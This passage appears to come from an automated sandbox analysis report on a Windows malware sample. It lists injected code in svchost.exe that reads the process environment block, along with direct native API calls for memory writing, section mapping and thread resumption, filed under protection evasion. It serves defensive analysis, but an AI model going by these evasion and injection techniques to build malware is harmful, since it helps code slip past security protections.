            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B68402 mov eax, dword ptr fs:[00000030h]1_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B68402 mov eax, dword ptr fs:[00000030h]1_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B68402 mov eax, dword ptr fs:[00000030h]1_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5A470 mov eax, dword ptr fs:[00000030h]1_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5A470 mov eax, dword ptr fs:[00000030h]1_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5A470 mov eax, dword ptr fs:[00000030h]1_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBC460 mov ecx, dword ptr fs:[00000030h]1_2_03BBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEA456 mov eax, dword ptr fs:[00000030h]1_2_03BEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2645D mov eax, dword ptr fs:[00000030h]1_2_03B2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5245A mov eax, dword ptr fs:[00000030h]1_2_03B5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40BBE mov eax, dword ptr fs:[00000030h]1_2_03B40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40BBE mov eax, dword ptr fs:[00000030h]1_2_03B40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]1_2_03BE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]1_2_03BE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38BF0 mov eax, dword ptr fs:[00000030h]1_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38BF0 mov eax, dword ptr fs:[00000030h]1_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38BF0 mov eax, dword ptr fs:[00000030h]1_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5EBFC mov eax, dword ptr fs:[00000030h]1_2_03B5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBCBF0 mov eax, dword ptr fs:[00000030h]1_2_03BBCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDEBD0 mov eax, dword ptr fs:[00000030h]1_2_03BDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B50BCB mov eax, dword ptr fs:[00000030h]1_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B50BCB mov eax, dword ptr fs:[00000030h]1_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B50BCB mov eax, dword ptr fs:[00000030h]1_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30BCD mov eax, dword ptr fs:[00000030h]1_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30BCD mov eax, dword ptr fs:[00000030h]1_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30BCD mov eax, dword ptr fs:[00000030h]1_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5EB20 mov eax, dword ptr fs:[00000030h]1_2_03B5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5EB20 mov eax, dword ptr fs:[00000030h]1_2_03B5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF8B28 mov eax, dword ptr fs:[00000030h]1_2_03BF8B28
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C04B00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2CB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B28B50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDEB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC6B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC6B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD8B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B38AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B38AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B86AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B68A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C04A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B30AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B64AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B64AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B86ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B86ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B86ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B54A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B54A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B5EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BBCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B40A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B40A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C04940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BBC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B28918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B28918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BAE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BAE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BBC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B56962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B56962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B56962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B7096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B7096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B7096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C008C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BBC89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B30887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B52835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BBC810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BBE872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001F81F7 GetSecurityDescriptorDacl, _memset, GetAclInformation, GetLengthSid, GetAce, AddAce, GetLengthSid, GetProcessHeap, HeapAlloc, GetLengthSid, CopySid, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001CA364 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001CA395 SetUnhandledExceptionFilter, UnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtResumeThread: Direct from: 0x76F02FBC
